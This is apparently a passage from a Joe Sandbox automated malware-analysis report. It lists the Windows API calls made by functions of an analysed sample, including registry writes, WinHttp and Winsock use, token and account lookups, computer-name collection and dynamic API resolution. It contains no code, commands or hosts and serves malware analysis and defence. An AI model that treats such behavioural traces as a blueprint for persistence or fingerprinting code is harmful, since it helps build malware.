      • Part of subcall function 00401560: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00401992), ref: 0040167A
      • Part of subcall function 00401560: HeapFree.KERNEL32(00000000), ref: 0040167D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040199E
    • HeapFree.KERNEL32(00000000), ref: 004019A1
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019AA
    • HeapFree.KERNEL32(00000000), ref: 004019B3
    • GetProcessHeap.KERNEL32(00000000,?), ref: 004019B8
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • lstrlenW.KERNEL32(001CFDA8,76AD46E9,7142434B,76E6FE8D), ref: 00408921
    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00408941
    • HeapAlloc.KERNEL32(00000000), ref: 00408944
    • GetProcessHeap.KERNEL32(00000008,?), ref: 00408963
    • HeapAlloc.KERNEL32(00000000), ref: 00408966
    • lstrcpyW.KERNEL32(00000000,?), ref: 0040897B
    • GetProcessHeap.KERNEL32(00000008,00000021), ref: 004089BB
    • HeapAlloc.KERNEL32(00000000), ref: 004089BE
    • GetClipboardOwner.USER32 ref: 004089D2
    • GetTickCount.KERNEL32(00000005), ref: 004089FE
    • wsprintfW.USER32 ref: 00408A0F
    • wsprintfW.USER32 ref: 00408A1F
    • GetProcessHeap.KERNEL32(00000008,00000104), ref: 00408A33
    • HeapAlloc.KERNEL32(00000000), ref: 00408A36
    • GetTickCount.KERNEL32 ref: 00408A47
    • GetProcessHeap.KERNEL32(00000008,00000044), ref: 00408AE0
    • HeapAlloc.KERNEL32(00000000), ref: 00408AE3
    • GetClipboardSequenceNumber.USER32 ref: 00408AF7
    • wsprintfA.USER32 ref: 00408B2D
      • Part of subcall function 0040DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0040DD37
      • Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD44
      • Part of subcall function 0040DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040DD6B
      • Part of subcall function 0040DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00401970,?), ref: 0040DD76
      • Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD80
      • Part of subcall function 0040DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00401970,?), ref: 0040DD95
      • Part of subcall function 0040DD0B: CloseHandle.KERNEL32(00000000), ref: 0040DD9C
      • Part of subcall function 0040DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401970,?), ref: 0040DDA9
      • Part of subcall function 0040DD0B: HeapFree.KERNEL32(00000000), ref: 0040DDB0
    • HeapFree.KERNEL32(00000000), ref: 00408B79
      • Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000008,00000015,00000000,?,?), ref: 00408799
      • Part of subcall function 00408761: HeapAlloc.KERNEL32(00000000), ref: 0040879C
      • Part of subcall function 00408761: GetTickCount.KERNEL32 ref: 004087B8
      • Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00408804
      • Part of subcall function 00408761: HeapAlloc.KERNEL32(00000000), ref: 00408807
      • Part of subcall function 00408761: GetCapture.USER32 ref: 00408819
      • Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0040886A
      • Part of subcall function 00408761: HeapAlloc.KERNEL32(00000000), ref: 00408871
      • Part of subcall function 00408761: GetCursor.USER32 ref: 00408885
      • Part of subcall function 00408761: LoadLibraryA.KERNEL32(66713859), ref: 004088B6
      • Part of subcall function 00408761: GetProcAddress.KERNEL32(00000000), ref: 004088BD
      • Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004088DF
      • Part of subcall function 00408761: HeapFree.KERNEL32(00000000), ref: 004088EC
      • Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000000,66713859), ref: 004088F7
      • Part of subcall function 00408761: HeapFree.KERNEL32(00000000), ref: 004088FA
      • Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000000,?), ref: 00408901
      • Part of subcall function 00408761: HeapFree.KERNEL32(00000000), ref: 00408904
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408B60
    • HeapFree.KERNEL32(00000000), ref: 00408B67
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408B76
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408B84
    • HeapFree.KERNEL32(00000000), ref: 00408B87
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408B90
    • HeapFree.KERNEL32(00000000), ref: 00408B93
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408B9F
    • HeapFree.KERNEL32(00000000), ref: 00408BA2
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040487E
    • HeapAlloc.KERNEL32(00000000), ref: 00404881
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040489A
    • HeapAlloc.KERNEL32(00000000), ref: 0040489D
    • OpenProcess.KERNEL32(00000400,00000000), ref: 004048D1
    • OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00404907
    • ProcessIdToSessionId.KERNEL32(?,?), ref: 00404921
    • GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00404942
    • GetLastError.KERNEL32 ref: 00404944
    • GetProcessHeap.KERNEL32(00000008,?), ref: 00404958
    • HeapAlloc.KERNEL32(00000000), ref: 0040495B
    • GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00404979
    • LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0040499D
    • GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00404A0C
    • HeapAlloc.KERNEL32(00000000), ref: 00404A0F
    • GetCursor.USER32 ref: 00404A20
    • wsprintfW.USER32 ref: 00404A53
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404A6C
    • HeapFree.KERNEL32(00000000), ref: 00404A75
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00404A7C
    • HeapFree.KERNEL32(00000000), ref: 00404A7F
    • CloseHandle.KERNEL32(00000000), ref: 00404A84
    • CloseHandle.KERNEL32(?), ref: 00404A8D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00404A9B
    • HeapFree.KERNEL32(00000000), ref: 00404A9E
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404AA3
    • HeapFree.KERNEL32(00000000), ref: 00404AA6
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • WinHttpGetIEProxyConfigForCurrentUser.WINHTTP(?,00000000,?,00000000), ref: 004035E0
    • WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000), ref: 0040361F
    • WinHttpGetProxyForUrl.WINHTTP(00000000,?,00000000,?), ref: 00403677
    • StrCpyW.SHLWAPI(?,00000000), ref: 0040368D
    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00403694
    • GlobalFree.KERNEL32(00000000), ref: 004036A9
    • GlobalFree.KERNEL32(00000000), ref: 004036B8
    • WinHttpCloseHandle.WINHTTP(00000000), ref: 004036C0
    • GlobalFree.KERNEL32(00000000), ref: 004036D5
    • GlobalFree.KERNEL32(00000000), ref: 004036E0
    • PathMatchSpecW.SHLWAPI(?,00000000), ref: 004036FD
    • StrCpyW.SHLWAPI(?,00000000), ref: 0040372D
    • GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0040376A
    • HeapAlloc.KERNEL32(00000000), ref: 0040376D
    • GetDoubleClickTime.USER32 ref: 0040378B
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 004037E0
    • HeapAlloc.KERNEL32(00000000), ref: 004037E3
    • GetCurrentThreadId.KERNEL32 ref: 004037F7
    • StrStrIW.SHLWAPI(?,?), ref: 00403824
    • StrStrIW.SHLWAPI(00000000,00000000), ref: 0040384C
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403886
    • HeapFree.KERNEL32(00000000), ref: 0040388F
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00403894
    • HeapFree.KERNEL32(00000000), ref: 00403897
    • GlobalFree.KERNEL32(00000000), ref: 004038AA
    • GlobalFree.KERNEL32(?), ref: 004038B4
    • GlobalFree.KERNEL32(00000000), ref: 004038BF
    • StrCpyW.SHLWAPI(?,-00000002), ref: 004038D1
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004038DA
    • HeapFree.KERNEL32(00000000), ref: 004038E7
    • GetProcessHeap.KERNEL32(00000000,?), ref: 004038EC
    • HeapFree.KERNEL32(00000000), ref: 004038F3
      • Part of subcall function 00403551: WinHttpCrackUrl.WINHTTP(?,?,00000000,0000003C,?,00000208), ref: 00403593
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000208,0041CAA8), ref: 00403E3F
    • HeapAlloc.KERNEL32(00000000), ref: 00403E42
      • Part of subcall function 00403950: GetVersion.KERNEL32(76E6FE8D,00000000,?), ref: 00403971
      • Part of subcall function 00403950: GetProcessHeap.KERNEL32(00000008,00000025), ref: 004039B0
      • Part of subcall function 00403950: HeapAlloc.KERNEL32(00000000), ref: 004039B7
      • Part of subcall function 00403950: GetCurrentProcessId.KERNEL32 ref: 004039C8
      • Part of subcall function 00403950: GetProcessHeap.KERNEL32(00000008,00000051), ref: 00403A72
      • Part of subcall function 00403950: HeapAlloc.KERNEL32(00000000), ref: 00403A79
      • Part of subcall function 00403950: GetForegroundWindow.USER32 ref: 00403A8A
      • Part of subcall function 00403950: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403AC8
      • Part of subcall function 00403950: HeapFree.KERNEL32(00000000), ref: 00403ACF
      • Part of subcall function 004038F7: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,0040131B,00000000,0040131B,00000000,00000001,?,0040131B,00020006), ref: 00403929
      • Part of subcall function 004038F7: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,0040131B,0040131B,?,0040131B,00020006), ref: 0040393C
    • GetProcessHeap.KERNEL32(00000008,00000039,00020019), ref: 00403ED2
    • HeapAlloc.KERNEL32(00000000), ref: 00403ED9
    • GetTickCount.KERNEL32 ref: 00403EED
    • wsprintfW.USER32 ref: 00403F24
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 00403F6E
    • HeapAlloc.KERNEL32(00000000), ref: 00403F71
    • GetCaretBlinkTime.USER32 ref: 00403F86
    • wsprintfW.USER32 ref: 00403FC8
    • RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000003,00000000,?,00020019), ref: 0040401D
    • GetProcessHeap.KERNEL32(00000008,?), ref: 0040402C
    • HeapAlloc.KERNEL32(00000000), ref: 0040402F
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00404051
    • RegCloseKey.ADVAPI32(?), ref: 00404077
    • GetProcessHeap.KERNEL32(00000008,?), ref: 00404099
    • HeapAlloc.KERNEL32(00000000), ref: 0040409C
    • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 004040AE
    • HeapReAlloc.KERNEL32(00000000), ref: 004040B1
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004040D5
    • HeapFree.KERNEL32(00000000), ref: 004040D8
    • GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 004040E4
    • HeapFree.KERNEL32(00000000), ref: 004040ED
    • RegCloseKey.ADVAPI32(?), ref: 004040FC
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00404107
    • HeapFree.KERNEL32(00000000), ref: 0040410A
    • GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 00404112
    • HeapFree.KERNEL32(00000000), ref: 00404115
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000002), ref: 00407C57
    • HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407C5A
    • GetShellWindow.USER32 ref: 00407C6F
    • GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00407CF0
    • HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407CF3
    • GetProcessWindowStation.USER32 ref: 00407D08
    • GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00407D47
    • GetProcAddress.KERNEL32(00000000,00000000,?,00000002), ref: 00407D70
    • GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00407D86
    • GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00407DED
    • HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407DF0
    • GetProcessWindowStation.USER32 ref: 00407E02
    • GetProcAddress.KERNEL32(00000000,?,00000002), ref: 00407E31
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 00407E3F
    • HeapFree.KERNEL32(00000000,?,00000002), ref: 00407E42
      • Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0040752D
      • Part of subcall function 004074D8: HeapAlloc.KERNEL32(00000000), ref: 00407530
      • Part of subcall function 004074D8: GetMessageTime.USER32 ref: 00407544
      • Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040759E
      • Part of subcall function 004074D8: HeapAlloc.KERNEL32(00000000), ref: 004075A1
      • Part of subcall function 004074D8: IsSystemResumeAutomatic.KERNEL32 ref: 004075B5
      • Part of subcall function 004074D8: GetModuleHandleA.KERNEL32(00000000,?), ref: 004075E6
      • Part of subcall function 004074D8: GetProcAddress.KERNEL32(00000000), ref: 004075ED
      • Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407601
      • Part of subcall function 004074D8: HeapFree.KERNEL32(00000000), ref: 0040760A
      • Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000000,?), ref: 0040760F
      • Part of subcall function 004074D8: HeapFree.KERNEL32(00000000), ref: 00407612
      • Part of subcall function 004074D8: OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0040762E
      • Part of subcall function 004074D8: CloseHandle.KERNEL32(00000000), ref: 0040764D
    • GetProcessHeap.KERNEL32(00000008,00000200,?,00000002), ref: 00407E89
    • HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407E8C
    • GetProcessHeap.KERNEL32(00000008,00000100,?,00000002), ref: 00407EA4
    • HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407EA7
    • HeapFree.KERNEL32(00000000,?,00000002), ref: 00408082
      • Part of subcall function 00407A57: GetCurrentProcessId.KERNEL32(00000000,?,00000000), ref: 00407A81
      • Part of subcall function 00407A57: GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000000), ref: 00407AC1
      • Part of subcall function 00407A57: HeapAlloc.KERNEL32(00000000), ref: 00407AC8
      • Part of subcall function 00407A57: GetShellWindow.USER32 ref: 00407ADF
      • Part of subcall function 00407A57: GetProcessHeap.KERNEL32(00000008,0000001C), ref: 00407B50
      • Part of subcall function 00407A57: HeapAlloc.KERNEL32(00000000), ref: 00407B57
      • Part of subcall function 00407A57: DestroyCaret.USER32 ref: 00407B6D
      • Part of subcall function 00407A57: GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00407B9E
      • Part of subcall function 00407A57: GetProcAddress.KERNEL32(00000000), ref: 00407BA5
      • Part of subcall function 00407A57: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407BB4
      • Part of subcall function 00407A57: HeapFree.KERNEL32(00000000), ref: 00407BC1
      • Part of subcall function 00407A57: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407BC5
      • Part of subcall function 00407A57: HeapFree.KERNEL32(00000000), ref: 00407BCC
      • Part of subcall function 00407A57: CloseHandle.KERNEL32(00000002), ref: 00407C02
    • GetProcessHeap.KERNEL32(00000000,76E6FE8D,?,00000002), ref: 00408065
    • HeapFree.KERNEL32(00000000,?,00000002), ref: 0040806C
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 0040807F
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 004080B5
    • HeapFree.KERNEL32(00000000,?,00000002), ref: 004080BE
    • GetProcessHeap.KERNEL32(00000000,?,?,00000002), ref: 004080C3
    • HeapFree.KERNEL32(00000000,?,00000002), ref: 004080C6
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000208,00000000), ref: 00403B01
    • HeapAlloc.KERNEL32(00000000), ref: 00403B04
      • Part of subcall function 00403950: GetVersion.KERNEL32(76E6FE8D,00000000,?), ref: 00403971
      • Part of subcall function 00403950: GetProcessHeap.KERNEL32(00000008,00000025), ref: 004039B0
      • Part of subcall function 00403950: HeapAlloc.KERNEL32(00000000), ref: 004039B7
      • Part of subcall function 00403950: GetCurrentProcessId.KERNEL32 ref: 004039C8
      • Part of subcall function 00403950: GetProcessHeap.KERNEL32(00000008,00000051), ref: 00403A72
      • Part of subcall function 00403950: HeapAlloc.KERNEL32(00000000), ref: 00403A79
      • Part of subcall function 00403950: GetForegroundWindow.USER32 ref: 00403A8A
      • Part of subcall function 00403950: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403AC8
      • Part of subcall function 00403950: HeapFree.KERNEL32(00000000), ref: 00403ACF
      • Part of subcall function 004038F7: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,0040131B,00000000,0040131B,00000000,00000001,?,0040131B,00020006), ref: 00403929
      • Part of subcall function 004038F7: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,0040131B,0040131B,?,0040131B,00020006), ref: 0040393C
    • GetProcessHeap.KERNEL32(00000008,00000039,00020006), ref: 00403BC8
    • HeapAlloc.KERNEL32(00000000), ref: 00403BCB
    • GetTickCount.KERNEL32 ref: 00403BDF
    • wsprintfW.USER32 ref: 00403C16
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 00403C56
    • HeapAlloc.KERNEL32(00000000), ref: 00403C59
    • GetCaretBlinkTime.USER32 ref: 00403C6D
    • wsprintfW.USER32 ref: 00403CB2
    • RegDeleteValueW.ADVAPI32(?,?), ref: 00403CC5
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403CD4
    • HeapFree.KERNEL32(00000000), ref: 00403CD7
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 00403D22
    • HeapAlloc.KERNEL32(00000000), ref: 00403D25
    • GetCaretBlinkTime.USER32 ref: 00403D39
    • wsprintfW.USER32 ref: 00403D7E
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00403DAE
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403DC6
    • HeapFree.KERNEL32(00000000), ref: 00403DC9
    • RegCloseKey.ADVAPI32(?), ref: 00403DEA
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00403DF5
    • HeapFree.KERNEL32(00000000), ref: 00403DF8
    • GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00403E04
    • HeapFree.KERNEL32(00000000), ref: 00403E07
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000029,00000000,76E6C426,00000000), ref: 0040D0F6
    • HeapAlloc.KERNEL32(00000000), ref: 0040D0FD
    • GetCapture.USER32 ref: 0040D10F
    • WSAStartup.WS2_32(00000201,?), ref: 0040D147
    • GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0040D1F5
    • HeapAlloc.KERNEL32(00000000), ref: 0040D1FC
    • GetCurrentThreadId.KERNEL32 ref: 0040D20E
    • wsprintfA.USER32 ref: 0040D241
    • Sleep.KERNEL32(-0000EA60,00000000,?,00000000,00000000), ref: 0040D2A1
    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0040D2CF
    • HeapFree.KERNEL32(00000000), ref: 0040D2D6
      • Part of subcall function 004047D4: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,76E6C570,0040D305,00000000,?,00000000,00000000), ref: 004047F4
      • Part of subcall function 004047D4: HeapFree.KERNEL32(00000000), ref: 004047F7
      • Part of subcall function 004047D4: GetProcessHeap.KERNEL32(00000008,?,?,00000000,76E6C570,0040D305,00000000,?,00000000,00000000), ref: 00404801
      • Part of subcall function 004047D4: HeapAlloc.KERNEL32(00000000), ref: 00404804
      • Part of subcall function 0040482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0040318E,00000000,?,00000000,0040D266,?,00000001,00000000,76E6C570,?,?,0040D266), ref: 00404845
      • Part of subcall function 0040482B: HeapFree.KERNEL32(00000000,?,0040D266), ref: 0040484C
    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0040D310
    • HeapFree.KERNEL32(00000000), ref: 0040D317
    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0040D326
    • HeapFree.KERNEL32(00000000), ref: 0040D32D
    • GetProcessHeap.KERNEL32(00000000,0040D3F2), ref: 0040D33E
    • HeapFree.KERNEL32(00000000), ref: 0040D345
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,0040E7ED,?), ref: 0040E39F
    • GetProcessHeap.KERNEL32(00000008,000000C8,774229EE,76E6FE8D), ref: 0040E3B7
    • HeapAlloc.KERNEL32(00000000), ref: 0040E3BE
    • RegQueryValueExA.ADVAPI32(0040E7ED,?,00000000,00000000,00000000,?), ref: 0040E3EB
    • RegQueryValueExA.ADVAPI32(0040E7ED,74736E49,00000000,00000000,?,00000004), ref: 0040E411
    • RegQueryValueExA.ADVAPI32(0040E7ED,49676552,00000000,00000000,?,00000004), ref: 0040E43F
    • GetTickCount.KERNEL32 ref: 0040E445
    • RegCloseKey.ADVAPI32(0040E7ED), ref: 0040E451
    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,0004001F,0040E7ED), ref: 0040E467
    • RegSetValueExA.ADVAPI32(0040E7ED,49676552,00000000,00000004,?,00000004), ref: 0040E482
    • RegCloseKey.ADVAPI32(0040E7ED), ref: 0040E499
    • lstrlenA.KERNEL32(00000008), ref: 0040E4A5
    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040E4CB
    • HeapAlloc.KERNEL32(00000000), ref: 0040E4D2
    • GetComputerNameA.KERNEL32(00000000,00000004), ref: 0040E4DF
    • lstrlenA.KERNEL32(00000000), ref: 0040E4E6
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E503
    • HeapFree.KERNEL32(00000000), ref: 0040E510
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E517
    • HeapFree.KERNEL32(00000000), ref: 0040E51E
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetCurrentProcessId.KERNEL32(00000000,?,00000000), ref: 00407A81
    • GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000000), ref: 00407AC1
    • HeapAlloc.KERNEL32(00000000), ref: 00407AC8
    • GetShellWindow.USER32 ref: 00407ADF
    • GetProcessHeap.KERNEL32(00000008,0000001C), ref: 00407B50
    • HeapAlloc.KERNEL32(00000000), ref: 00407B57
    • DestroyCaret.USER32 ref: 00407B6D
    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00407B9E
    • GetProcAddress.KERNEL32(00000000), ref: 00407BA5
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407BB4
    • HeapFree.KERNEL32(00000000), ref: 00407BC1
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407BC5
    • HeapFree.KERNEL32(00000000), ref: 00407BCC
    • CloseHandle.KERNEL32(00000002), ref: 00407C02
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000015,00000000,?,?), ref: 00408799
    • HeapAlloc.KERNEL32(00000000), ref: 0040879C
    • GetTickCount.KERNEL32 ref: 004087B8
    • GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00408804
    • HeapAlloc.KERNEL32(00000000), ref: 00408807
    • GetCapture.USER32 ref: 00408819
    • GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0040886A
    • HeapAlloc.KERNEL32(00000000), ref: 00408871
    • GetCursor.USER32 ref: 00408885
    • LoadLibraryA.KERNEL32(66713859), ref: 004088B6
    • GetProcAddress.KERNEL32(00000000), ref: 004088BD
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004088DF
    • HeapFree.KERNEL32(00000000), ref: 004088EC
    • GetProcessHeap.KERNEL32(00000000,66713859), ref: 004088F7
    • HeapFree.KERNEL32(00000000), ref: 004088FA
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408901
    • HeapFree.KERNEL32(00000000), ref: 00408904
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 0042120D: EncodePointer.KERNEL32(00000000,00424877,00435AB0,00000314,00000000,?,?,?,?,?,00420961,00435AB0,Microsoft Visual C++ Runtime Library,00012010), ref: 0042120F
    • LoadLibraryW.KERNEL32(USER32.DLL), ref: 0042488C
    • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 004248A8
    • EncodePointer.KERNEL32(00000000), ref: 004248B9
    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004248C6
    • EncodePointer.KERNEL32(00000000), ref: 004248C9
    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004248D6
    • EncodePointer.KERNEL32(00000000), ref: 004248D9
    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 004248E6
    • EncodePointer.KERNEL32(00000000), ref: 004248E9
    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 004248FA
    • EncodePointer.KERNEL32(00000000), ref: 004248FD
    • DecodePointer.KERNEL32(00000000,00435AB0,00000314,00000000), ref: 0042491F
    • DecodePointer.KERNEL32 ref: 00424929
    • DecodePointer.KERNEL32(?,00435AB0,00000314,00000000), ref: 00424968
    • DecodePointer.KERNEL32(?), ref: 00424982
    • DecodePointer.KERNEL32(00435AB0,00000314,00000000), ref: 00424996
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
